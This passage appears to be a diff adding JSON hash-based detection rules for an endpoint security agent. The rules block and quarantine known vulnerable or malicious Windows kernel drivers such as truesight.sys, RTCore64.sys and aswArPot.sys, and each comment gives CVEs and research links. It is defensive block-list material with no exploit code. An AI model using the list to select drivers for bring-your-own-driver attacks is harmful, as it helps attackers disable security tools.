"2026-03-23T11:45:30.475574Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d53f9111a5e6c94b37e3f39c5860897405cb250dd11aa91c3814a98b1759c055", + "comment": "Vulnerable Kernel Driver (aka vboxguest.sys) [https://www.loldrivers.io/drivers/0baa833c-e4e1-449e-86ee-cafeb11f5fd5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "643a5106-3616-5edc-b3b4-32f5358f9782", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829220Z", + "creation_date": "2026-03-23T11:45:30.829222Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19f8229e01786a26efbc4edb0a2e4487bd920e25054a9f41118c7947a4eb5794", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64472055-888b-5233-87a7-18a1932eb478", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823890Z", + "creation_date": "2026-03-23T11:45:31.823893Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823901Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44de27f89ff24682b904d4810849fd22a5e79e989e08c34c4940b4cdb0e7698f", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "645d1e4b-a68f-51e0-9796-15abc87560cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817105Z", + "creation_date": "2026-03-23T11:45:30.817107Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817112Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "070ff602cccaaef9e2b094e03983fd7f1bf0c0326612eb76593eabbf1bda9103", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "646bbcd0-bd96-5c61-965f-99f1fc44f617", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.968862Z", + "creation_date": "2026-03-23T11:45:29.968864Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968882Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1078af0c70e03ac17c7b8aa5ee03593f5decfef2f536716646a4ded1e98c153c", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "646d9987-13f2-58c3-ac91-9e4584600946", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608068Z", + "creation_date": "2026-03-23T11:45:29.608070Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608076Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61a1f530a5d47339275657d7883911d64f64909569cf13d2e6868df01a2a72cb", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "647d660d-2536-54f9-997e-b24a65505b99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816424Z", + "creation_date": "2026-03-23T11:45:31.816427Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816435Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9d5c61da080a0e5d2127db2bc9d44b3f3c70c202c9552150bc69c7d4c94b0d6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6487129e-6d15-540a-be35-5bbd3c3b2c0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825467Z", + "creation_date": "2026-03-23T11:45:30.825469Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825475Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c8c0e8d9879f07f7d997d099d40d23a5bced78cc68296f2800577ab3478487f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "648972ef-a734-5dfe-8422-500d7a40bbaa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160909Z", + "creation_date": "2026-03-23T11:45:31.160911Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160916Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62b03c697cbda97c47abd8fa1ee9e15261f84fb274ac52d4673dab775cd161dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "649b83ce-df00-54a5-84d6-2b0965b294df", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142664Z", + "creation_date": "2026-03-23T11:45:31.142666Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142672Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff1a608df20f499b494851dab969088196a3115bafc4999e68e4144788bf8264", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "649d9ebb-0710-5c1f-8b69-a4981f55eb1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819336Z", + "creation_date": "2026-03-23T11:45:31.819338Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819344Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "837e2910d122f44501328bb217bbcda4dffdda8739fbcbf99d57171f42d19d8c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "649ed89c-c44c-51c6-bfd3-b2eed6c4eb6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480770Z", + "creation_date": "2026-03-23T11:45:30.480772Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31e2e5c3290989e8624820cf5af886fd778ee8187fed593f33a6178f65103f37", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64a4bf5b-4b9f-542f-91a0-efb3f744a4fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822529Z", + "creation_date": "2026-03-23T11:45:30.822531Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822537Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28bac5dbcdd887f35f8fef454d5df1f53c18a90c51d8222636f487a0f351f725", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64a8b70d-ba09-5f80-8397-487b50e5b915", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622208Z", + "creation_date": "2026-03-23T11:45:29.622210Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622216Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6191c20426dd9b131122fb97e45be64a4d6ce98cc583406f38473434636ddedc", + "comment": "BioStar Racing GT EVO vulnerable driver 
(aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64aa82d4-7da8-59d2-9945-0cf763a7e43e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978388Z", + "creation_date": "2026-03-23T11:45:29.978390Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978395Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "496f4a4021226fb0f1b5f71a7634c84114c29faa308746a12c2414adb6b2a40b", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64b41444-2a48-57a5-9c2a-769dc5a6630d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608759Z", + "creation_date": "2026-03-23T11:45:29.608761Z", + "enabled": true, + "block_on_agent": 
true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608767Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "596ada5ecd89f53ec997c6791bc8f97dd9fbe3e9433b4eb086d7f4e1843aeb67", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64b6ae9b-e600-5e8e-8537-73e71a19bee4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812134Z", + "creation_date": "2026-03-23T11:45:31.812136Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812142Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b84a41a74ed61893ec976321dc761ee72385326e7ea2f46a1238f7af86f6787a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64b7b2bd-2105-52f2-b35f-b96d6a596a16", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150495Z", + "creation_date": "2026-03-23T11:45:31.150497Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150503Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a77dee1db0339390fa27b11bb8e9e5a42456bff8475c56897ebf075ac0edb67", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64d337d3-b02c-55ae-b66c-df6daee543f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820754Z", + "creation_date": "2026-03-23T11:45:30.820756Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820762Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa77a472e95c4d0a2271e5d7253a85af25c07719df26941b39082cfc0733071a", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64d4d9d2-3681-5f76-88bc-c186456b9efd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461867Z", + "creation_date": "2026-03-23T11:45:30.461882Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461891Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be70be9d84ae14ea1fa5ec68e2a61f6acfe576d965fe51c6bac78fba01a744fb", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64da875a-edbf-5509-902f-21ce7dfa93a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145400Z", + "creation_date": "2026-03-23T11:45:32.145404Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145412Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4eaf2205cdd189cc96806bd5364a505f77ad5dbb622558cd374044965fd20658", + "comment": "Malicious Kernel Driver (aka driver_e1123b59.sys) [https://www.loldrivers.io/drivers/11a73c42-26aa-446b-8560-43eecb265091/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64e0b04d-dfe5-5e9a-8b5d-f584ef5e6dab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824004Z", + "creation_date": "2026-03-23T11:45:30.824007Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c85c10c26b9941abb5e7bc3e5a01a128da7c44b8b2a24b2d2654225d48ae6f8f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64f36027-17a5-5d2f-aaa5-a40117162dac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984729Z", + "creation_date": "2026-03-23T11:45:29.984731Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984736Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab300e7e0d5d540900dbe11495b8d6788039d1cffb22e2dc2304b730a71eec97", + "comment": "Dangerous Physmem Kernel Driver (aka asmmap.Sys) [https://www.loldrivers.io/drivers/d0048840-970f-4ad5-9a07-1d39469d721f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64f70719-cc96-5d48-bdb8-840631d1a640", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613460Z", + "creation_date": "2026-03-23T11:45:29.613462Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613467Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11eecf9e6e2447856ed4cf86ee1cb779cfe0672c808bbd5934cf2f09a62d6170", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "64f8d71e-7176-5b19-8f40-84386f638172", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152568Z", + "creation_date": "2026-03-23T11:45:31.152570Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152575Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c4985e6dd1719e2b4d40e2748ea6d631fa75a8d0c36ef9f05a7bf910d7583700", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "65062a53-1930-5b23-954b-0ef08c0d0350", + 
